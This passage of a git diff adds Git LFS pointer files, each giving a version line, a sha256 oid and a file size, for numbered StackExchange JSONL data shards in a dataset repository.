https://git-lfs.github.com/spec/v1 +oid sha256:1eb798b92729a8185535ad5e7626bff2fb8bc9ca22bb15134f86d11143edba62 +size 38475359 diff --git a/data/stackexchange/1-1/1088_2289.jsonl b/data/stackexchange/1-1/1088_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..035d61acba15abab378e39670cbdba77afe73f4d --- /dev/null +++ b/data/stackexchange/1-1/1088_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71eada4a03550b08e1f19760a8e7da6dd2e1c8bdaaede8ae92b3d22de74e4568 +size 37921251 diff --git a/data/stackexchange/1-1/1089_2289.jsonl b/data/stackexchange/1-1/1089_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dad0be550c6bb8c3d07802854ca7e473cbbcfc2c --- /dev/null +++ b/data/stackexchange/1-1/1089_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bbededd88496d5f9243f9959bddfdc0af16bd4c9652fc690dd05152f4bb8028 +size 37991535 diff --git a/data/stackexchange/1-1/108_2289.jsonl b/data/stackexchange/1-1/108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1df292c5a5702de27df62e7654cb396befbd42fb --- /dev/null +++ b/data/stackexchange/1-1/108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8dd28f585fabfd4b91551326e59ea80a86a003d36b791c446030687682743a7c +size 33703827 diff --git a/data/stackexchange/1-1/1090_2289.jsonl b/data/stackexchange/1-1/1090_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1292d0cfd88c958e6f6608f5b845ce91e9ae06f --- /dev/null +++ b/data/stackexchange/1-1/1090_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d4b3c356d093c39c34ec1c5f0c8e93d3f72dced5f2971edb4ef9419ee1f2398 +size 38060547 diff --git a/data/stackexchange/1-1/1091_2289.jsonl b/data/stackexchange/1-1/1091_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e4b789ab254463fa495fd69ac8cabc0af65ddc8 --- /dev/null +++ b/data/stackexchange/1-1/1091_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32b6caf88f477bab977fbb27108f66ab6ce9d3e7e6b7ae6c8b59a60dc7f6eacd +size 37888055 diff --git a/data/stackexchange/1-1/1092_2289.jsonl b/data/stackexchange/1-1/1092_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08fa68a22c71c1e9be664c54d229fe7abe8390bf --- /dev/null +++ b/data/stackexchange/1-1/1092_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e0159be2c62513188079b8fb491a91392cfc284653463063d90d3bc18f9d6b +size 37809966 diff --git a/data/stackexchange/1-1/1093_2289.jsonl b/data/stackexchange/1-1/1093_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ff1698541e49e561a3536f40cec7973d57c4af80 --- /dev/null +++ b/data/stackexchange/1-1/1093_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4521227e7da7aaa2c641f226bc44d58cbb50785d7a13c3df6d9d4ad8c1c4cb31 +size 37338124 diff --git a/data/stackexchange/1-1/1094_2289.jsonl b/data/stackexchange/1-1/1094_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..08be56cbf1738d4205af3bc195000c14eaa6c628 --- /dev/null +++ b/data/stackexchange/1-1/1094_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4578ab82011dfe39ed8a7a150653cf08b9f09fecad311f575d6082956dd17283 +size 37517468 diff --git a/data/stackexchange/1-1/1095_2289.jsonl b/data/stackexchange/1-1/1095_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f6b1677c934a0a8c6b1f378ad9a030e7518729db --- /dev/null +++ b/data/stackexchange/1-1/1095_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6ceff746cdfd68dab8f12de02e3222d49aceb618fa57aa0e9be728144965fc76 +size 37752271 diff --git a/data/stackexchange/1-1/1096_2289.jsonl b/data/stackexchange/1-1/1096_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..484e20d9ebf24ab481dbfa6479aaa40d6900b96d --- /dev/null +++ b/data/stackexchange/1-1/1096_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4757d58b52d81a8fcadab7e4da4f0cdf99dd14d84dfeac0e9953cbf8a5d353e0 +size 37924514 diff --git a/data/stackexchange/1-1/1097_2289.jsonl b/data/stackexchange/1-1/1097_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1d4aa988eeda862866c352df1823159028dc1985 --- /dev/null +++ b/data/stackexchange/1-1/1097_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e71158218ec53669b5fa2f3d17a4999d9c0d8edd9458be1881403c0a9e9751bf +size 37782698 diff --git a/data/stackexchange/1-1/1098_2289.jsonl b/data/stackexchange/1-1/1098_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..406cdac111796e054f60119690ae3ac925b970cc --- /dev/null +++ b/data/stackexchange/1-1/1098_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2a488cbb597a191b42215f3d237acc71594a7cca7525c008bae74057e12f42d6 +size 37582718 diff --git a/data/stackexchange/1-1/1099_2289.jsonl b/data/stackexchange/1-1/1099_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef8304aa6d3d3436b874b4a332e8b5cfadd2c028 --- /dev/null +++ b/data/stackexchange/1-1/1099_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7540b11ddebecd549f84cb55bb085ac77b7dcd0c45e9b1b80f488b7b127d7aa6 +size 38003669 diff --git a/data/stackexchange/1-1/109_2289.jsonl b/data/stackexchange/1-1/109_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..440d9c1eaa4886d7548228ae0b1da792e5b91330 --- /dev/null +++ b/data/stackexchange/1-1/109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c4f959c2fdeea2b5839cbfca994be804250599c1fa0c955c505d28fe6811335 +size 33765849 diff --git a/data/stackexchange/1-1/10_2289.jsonl b/data/stackexchange/1-1/10_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a5a5aa69d3a08992d54e075297309948a3d8c20c --- /dev/null +++ b/data/stackexchange/1-1/10_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8febb84aafb749341c2fe2170a83c2a0683ce45098b5f7286af46c15db8705ae +size 35915407 diff --git a/data/stackexchange/1-1/1100_2289.jsonl b/data/stackexchange/1-1/1100_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3515e33e141099ee617e9cb2a9d0ef1104453f36 --- /dev/null +++ b/data/stackexchange/1-1/1100_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e9e15bce82df8c2380e2034a43ae46536bbb30988b4f37484db6ddf87c4dad3d +size 35132340 diff --git a/data/stackexchange/1-1/1101_2289.jsonl b/data/stackexchange/1-1/1101_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea4988873f8ba8aa045eca566c57238c8a338173 --- /dev/null +++ b/data/stackexchange/1-1/1101_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc28f36abcff53ee99613435cf4c2650c912b888c3403e7e2c6a7de46f1ce8cd +size 35562029 diff --git a/data/stackexchange/1-1/1102_2289.jsonl b/data/stackexchange/1-1/1102_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ffe7260fd62a2746613ce3617c9daf8d469e494 --- /dev/null +++ b/data/stackexchange/1-1/1102_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:35b97899e79e2aa9cd63e9f9716090618c11b2621bc9e0dfe908e4b63b3336e8 +size 35214132 diff --git a/data/stackexchange/1-1/1103_2289.jsonl b/data/stackexchange/1-1/1103_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..847484d2d7f25e8b92dbfe8259d28e08835c924e --- /dev/null +++ b/data/stackexchange/1-1/1103_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b34845edfb8d5a90951d66b183beaed580b35b7bdb7c302bc097ae7c4d23b00c +size 35585666 diff --git a/data/stackexchange/1-1/1104_2289.jsonl b/data/stackexchange/1-1/1104_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c92da825fe7cda4861b6249c547648cfcd8c8c13 --- /dev/null +++ b/data/stackexchange/1-1/1104_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fea94febdd2f95438bec00695e1cba2d135c78eeda6c8aa827ad3368293b0aa6 +size 34808257 diff --git a/data/stackexchange/1-1/1105_2289.jsonl b/data/stackexchange/1-1/1105_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7194bb635ca5392e0f0116e0a5046920c5d59bd --- /dev/null +++ b/data/stackexchange/1-1/1105_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2595f1c23eaff2bda6852edc176610db740fe3e767e75f59582ac2473979651 +size 35222500 diff --git a/data/stackexchange/1-1/1106_2289.jsonl b/data/stackexchange/1-1/1106_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3d97f17dc847fb1f3a1735093305e6446801a6f8 --- /dev/null +++ b/data/stackexchange/1-1/1106_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0eb214d2cd8da03af88df45b169e697d2ab06d7e92b686401275bd90f811b61b +size 35458298 diff --git a/data/stackexchange/1-1/1107_2289.jsonl b/data/stackexchange/1-1/1107_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6532863663ed95d1c40b6108cecaa210cc275818 --- /dev/null +++ b/data/stackexchange/1-1/1107_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e99224e586ef0cbf315cc59e6e6ea901e31f5396a22378a509d7c9a875c53ba2 +size 35521334 diff --git a/data/stackexchange/1-1/1108_2289.jsonl b/data/stackexchange/1-1/1108_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b3461b4c736aadf4943633e73504982f7e6c47b2 --- /dev/null +++ b/data/stackexchange/1-1/1108_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88913c11e5c81f27f6cd0d9fc070a2c29096a0c9425e6e58d18cbfe1bf4089f0 +size 35846625 diff --git a/data/stackexchange/1-1/1109_2289.jsonl b/data/stackexchange/1-1/1109_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4f8a05e3cbfa446045ec3a1f74882d65a619f246 --- /dev/null +++ b/data/stackexchange/1-1/1109_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a178dd9d24f9699c893602ffc078e8e2d4c9f13695abedf38d318e68cac3b142 +size 36131100 diff --git a/data/stackexchange/1-1/110_2289.jsonl b/data/stackexchange/1-1/110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..65c232b74106b723ca3b12481ea14cffc8a90c3c --- /dev/null +++ b/data/stackexchange/1-1/110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:499227dcdaba28562e8dea269e7be6b90909b638382e11bbc985db9eb84a69e0 +size 33523528 diff --git a/data/stackexchange/1-1/1110_2289.jsonl b/data/stackexchange/1-1/1110_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..874b9fef1c38715c5a7072de51a24c957dd332e9 --- /dev/null +++ b/data/stackexchange/1-1/1110_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d38d4ad3090ef84a2efe5c9967358372a8d8c60a0cf309619fb1e5b2a188a39e +size 34741005 diff --git a/data/stackexchange/1-1/1111_2289.jsonl b/data/stackexchange/1-1/1111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d70d0357df8720c3848b9452aaff14af90ce8ad1 --- /dev/null +++ b/data/stackexchange/1-1/1111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1802d75c87652074b0e2c8d15699b018e703d617d39704239d7f296e5e84e171 +size 35586791 diff --git a/data/stackexchange/1-1/1112_2289.jsonl b/data/stackexchange/1-1/1112_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..227aea63008fb789c8c3b41d73e4363b1a4592ca --- /dev/null +++ b/data/stackexchange/1-1/1112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b201b986bd2167eedd9fe5ecc84bc02f5bbead97431fe94d54f9c97b03d3ab3 +size 35341515 diff --git a/data/stackexchange/1-1/1113_2289.jsonl b/data/stackexchange/1-1/1113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c710d99a44835627adaab7cf5a9732a2a4d392fa --- /dev/null +++ b/data/stackexchange/1-1/1113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a013e866ad36dd40d7de6c48c2e442be14c83bf2caee7319acd6b40e8f6a6e43 +size 34779237 diff --git a/data/stackexchange/1-1/1114_2289.jsonl b/data/stackexchange/1-1/1114_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3c8c8aa9db7552c28568648c78fe9c5854d59951 --- /dev/null +++ b/data/stackexchange/1-1/1114_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:abd5796041818d2cd6a55c1c2525c9b08e74e9e54d2ce52fbe3c019b686304f2 +size 35573597 diff --git a/data/stackexchange/1-1/1115_2289.jsonl b/data/stackexchange/1-1/1115_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f57d0fe53d50e55c8ba3ca8f837dd791f2aaacb --- /dev/null +++ b/data/stackexchange/1-1/1115_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd611c098d8e106d60d0178b5225c06eeaab19a52b2cfe4830bddaa79d711a67 +size 35327859 diff --git a/data/stackexchange/1-1/1116_2289.jsonl b/data/stackexchange/1-1/1116_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b9abb44993353d353d57fe511b36325a8a2c562d --- /dev/null +++ b/data/stackexchange/1-1/1116_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1956cfec0b3bce1a66eea727ea411ba68e8dce00c0b010fab3f64073addedc71 +size 35153791 diff --git a/data/stackexchange/1-1/1117_2289.jsonl b/data/stackexchange/1-1/1117_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d76cc4eb51259b58f1e59dc5720dc4e78213092c --- /dev/null +++ b/data/stackexchange/1-1/1117_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a9293ce25dba74db829b37891138f60bc47d3fdd26b7bed4d1baaf97556cfc1 +size 35683970 diff --git a/data/stackexchange/1-1/1118_2289.jsonl b/data/stackexchange/1-1/1118_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4df3184e093c74e40b77887d77d715a3da6a337 --- /dev/null +++ b/data/stackexchange/1-1/1118_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:971b2d69e20945c7602d30c7d4c6efa2a442b473d65ee82d5f0462e84f0b41ea +size 35417891 diff --git a/data/stackexchange/1-1/1119_2289.jsonl b/data/stackexchange/1-1/1119_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..41cc6a19cf01de587700ea870012ac1bb4a73fb8 --- /dev/null +++ b/data/stackexchange/1-1/1119_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:845f89943c3f3bf61f6ee2500868aa183a84856de8139df03a1ff442c964b4ad +size 34422259 diff --git a/data/stackexchange/1-1/111_2289.jsonl b/data/stackexchange/1-1/111_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e92433e6f18e870cf75e238ffcecf35ca23d775 --- /dev/null +++ b/data/stackexchange/1-1/111_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1c213bb14e522fd296415e691980c63dbd6a1d69dc4c9e49eafae7e3cc2ccbe +size 33839256 diff --git a/data/stackexchange/1-1/1120_2289.jsonl b/data/stackexchange/1-1/1120_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d266963598f3d12d074303c4b0928dc10661fcb1 --- /dev/null +++ b/data/stackexchange/1-1/1120_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74f5c10bd8ca5feb04b80d9d5209a78de4467f11cc953c4474757748aa956f7a +size 35131751 diff --git a/data/stackexchange/1-1/1121_2289.jsonl b/data/stackexchange/1-1/1121_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e039a4ee7749feddc5f17fce9ad5ac135cde6390 --- /dev/null +++ b/data/stackexchange/1-1/1121_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e66a99cf89f4357ef62ff118acde9afe1354abbc46eebfac93724ff4c18a03d +size 35898169 diff --git a/data/stackexchange/1-1/1122_2289.jsonl b/data/stackexchange/1-1/1122_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c109de3f3e466aa23dfc5ba15873972783516474 --- /dev/null +++ b/data/stackexchange/1-1/1122_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8388a3e06ee8403f60200c0a44856da08626c9bfc4a2090b0bc336f691dffe6 +size 35070435 diff --git a/data/stackexchange/1-1/1123_2289.jsonl b/data/stackexchange/1-1/1123_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aec5c05b7caa90cf69fb04d3d487c798b49f5c5b --- /dev/null +++ b/data/stackexchange/1-1/1123_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c88409f218c0321e5c23989498641f05db39cf706c731a64724938307f7154e5 +size 34544361 diff --git a/data/stackexchange/1-1/1124_2289.jsonl b/data/stackexchange/1-1/1124_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..31bc16e182436c97d499047b700226a331ecf95b --- /dev/null +++ b/data/stackexchange/1-1/1124_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2744321bc5905b2fd369e857e7d58e3eabc56c1a0034b3235f07aac99f1640c9 +size 35130990 diff --git a/data/stackexchange/1-1/1125_2289.jsonl b/data/stackexchange/1-1/1125_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95b92758db5277d7f5c80a98f5147fcf8fcb03e4 --- /dev/null +++ b/data/stackexchange/1-1/1125_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e87d026f1b2c84abb3eeb546e1fe73ab0f5288b3f81c158778292e1b59a2ec8f +size 35463469 diff --git a/data/stackexchange/1-1/1126_2289.jsonl b/data/stackexchange/1-1/1126_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7bb402bec1ebfd25eec7a4590302f3bff2dafa09 --- /dev/null +++ b/data/stackexchange/1-1/1126_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8ed0df8f56a29b49534dc5ded9c97ae22b1524fbe62328179ec04f97128a5eb +size 35148487 diff --git a/data/stackexchange/1-1/1127_2289.jsonl b/data/stackexchange/1-1/1127_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0c2217258e3d32aa1a121c1eb4db7a4a6518c02 --- /dev/null +++ b/data/stackexchange/1-1/1127_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c48303e3d1d50cbab7b8f6307661aa44cfccd0d675343e275d1f7e013af6269a +size 35542559 diff --git a/data/stackexchange/1-1/1128_2289.jsonl b/data/stackexchange/1-1/1128_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91191e5c8cbe1057f44bda8d771315d896c5fce8 --- /dev/null +++ b/data/stackexchange/1-1/1128_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:729bd9edfb2568df1c53b4ed6d56efe13443558bc3d1ac12cd215070d7067c69 +size 35515247 diff --git a/data/stackexchange/1-1/1129_2289.jsonl b/data/stackexchange/1-1/1129_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c3f80bb33e6696e9984b4aaa0dfa51c81e3b1387 --- /dev/null +++ b/data/stackexchange/1-1/1129_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ac6c40aa5332619daf8054b6eb4e67164918e12857c0e8cee8410708156b5235 +size 35749589 diff --git a/data/stackexchange/1-1/112_2289.jsonl b/data/stackexchange/1-1/112_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..933912d9f59706f11c6abada7c013d074513b335 --- /dev/null +++ b/data/stackexchange/1-1/112_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:651e0e290c443758f4bff31ab8d66226225b6a4b9c1e835b7663cba642f9b977 +size 33737609 diff --git a/data/stackexchange/1-1/1130_2289.jsonl b/data/stackexchange/1-1/1130_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8a05c4151532f698e1f8c56b27912200ce5303a --- /dev/null +++ b/data/stackexchange/1-1/1130_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd047339e2c508cf6a9f2b0173bddeb6436da24869f1373997ac1574071e1a3f +size 35020881 diff --git a/data/stackexchange/1-1/1131_2289.jsonl b/data/stackexchange/1-1/1131_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c832e73cff4adfb73843f87c093f6c18cd873753 --- /dev/null +++ b/data/stackexchange/1-1/1131_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8312c3aae3f3d573579d344bc9ce56824146cf7eb0c3593e483919ba206839e8 +size 35256101 diff --git a/data/stackexchange/1-1/1132_2289.jsonl b/data/stackexchange/1-1/1132_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c33412541be053d0ef6552e821298aeede6982aa --- /dev/null +++ b/data/stackexchange/1-1/1132_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:369621c291d06ed84564b16720a560209e9ecdb918afc82f6fa160bef06bc4af +size 35349881 diff --git a/data/stackexchange/1-1/1133_2289.jsonl b/data/stackexchange/1-1/1133_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14500e331e41913f3f6e6056eeae3d4db2a3ac3c --- /dev/null +++ b/data/stackexchange/1-1/1133_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd1699e34b063d82bd40cca164cc4a9e434cf08f7dbf2d8cb7e6533bd2a48655 +size 35496910 diff --git a/data/stackexchange/1-1/1134_2289.jsonl b/data/stackexchange/1-1/1134_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..20bf812f2852d91609e1d5b37b54a7429c9fa380 --- /dev/null +++ b/data/stackexchange/1-1/1134_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80626d95a9dbc9744253b99fa3c4d05edf537a56dd65d086e0579320af4557e4 +size 35283112 diff --git a/data/stackexchange/1-1/1135_2289.jsonl b/data/stackexchange/1-1/1135_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6899af0f8dcf4cf91c904d8cb2bc866d6d1024d6 --- /dev/null +++ b/data/stackexchange/1-1/1135_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:63fc0654795a2e2e03b9cd631224957f5df5dcb284e13a93695a9fda78d7781c +size 34682188 diff --git a/data/stackexchange/1-1/1136_2289.jsonl b/data/stackexchange/1-1/1136_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e6552574d6aeeb2f9415dd9ff8ae171bb958797b --- /dev/null +++ b/data/stackexchange/1-1/1136_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:12b5086066f8aac12d149bee5d3f60f891620d536a1b211483314716eb5d26ce +size 35040935 diff --git a/data/stackexchange/1-1/1137_2289.jsonl b/data/stackexchange/1-1/1137_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4910dba4d895b48c2edd7946e3afa4dc451b6a6f --- /dev/null +++ b/data/stackexchange/1-1/1137_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fb2dadd4c9e68944118b5efd3a12a951a316b3194183fdb78c9a01e9830aeb4b +size 35017879 diff --git a/data/stackexchange/1-1/1138_2289.jsonl b/data/stackexchange/1-1/1138_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..10e107bf4552ddc5eede7e1e34aa8c35f22e6e30 --- /dev/null +++ b/data/stackexchange/1-1/1138_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44a32a06e3e02730d374959a77ff1cee52cc0448019246c574a1d06042ddd098 +size 35009475 diff --git a/data/stackexchange/1-1/1139_2289.jsonl b/data/stackexchange/1-1/1139_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8eee5053a22f337101c1178cd3e25482d9686873 --- /dev/null +++ b/data/stackexchange/1-1/1139_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c31df17e7bc0cd987ef97cc443eb1bcb23789e089326b8500ac22c92fff767b9 +size 33006335 diff --git a/data/stackexchange/1-1/113_2289.jsonl b/data/stackexchange/1-1/113_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7c170380a04838d690b6a92dff21ad942bb0b218 --- /dev/null +++ b/data/stackexchange/1-1/113_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8c580633335e2bc4dc0f3f47ae848e8397a6ab3936fd121e54cacc3b96e5451 +size 33878006 diff --git a/data/stackexchange/1-1/1140_2289.jsonl b/data/stackexchange/1-1/1140_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..42cf20a694467d6e6a61458563f40c42b7c5dcfa --- /dev/null +++ b/data/stackexchange/1-1/1140_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f0edb71bc5312a450e38fd93c1f2eda17ef5bdb0817e05b668513b6a1a60603 +size 32535930 diff --git a/data/stackexchange/1-1/1141_2289.jsonl b/data/stackexchange/1-1/1141_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..855c5df0544fe48b2bc8df43701cd38c36875d82 --- /dev/null +++ b/data/stackexchange/1-1/1141_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7750330a9bbde84d603a9e48b5635a89f4d7c86bc289762e03310055203d1b07 +size 33117503 diff --git a/data/stackexchange/1-1/1142_2289.jsonl b/data/stackexchange/1-1/1142_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..94b0b3d68f37827dc38ab2f02b54a6acce2e7460 --- /dev/null +++ b/data/stackexchange/1-1/1142_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31ce5bc8656d99d40cd86e981f37a958f52f3964f7ea715ba5895480fa3583c8 +size 33310743 diff --git a/data/stackexchange/1-1/1143_2289.jsonl b/data/stackexchange/1-1/1143_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4b765ae68796ea152bc2f6cf1b3d5436d8c1576c --- /dev/null +++ b/data/stackexchange/1-1/1143_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9fa28790a73462c4fcfafedd084468cbfe09dd8ea46407835eb02c22b621a916 +size 33056654 diff --git a/data/stackexchange/1-1/1144_2289.jsonl b/data/stackexchange/1-1/1144_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a24db4acc213fdd70ccf14e9042b6cf7d84554b4 --- /dev/null +++ b/data/stackexchange/1-1/1144_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:896faab65733395c9a913bd8c2532632ee4b459cd22eb86555827fb8843d3278 +size 32636625 diff --git a/data/stackexchange/1-1/1145_2289.jsonl b/data/stackexchange/1-1/1145_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78d9c5ddbccc572d1f9bfbea967ebad1515389c5 --- /dev/null +++ b/data/stackexchange/1-1/1145_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 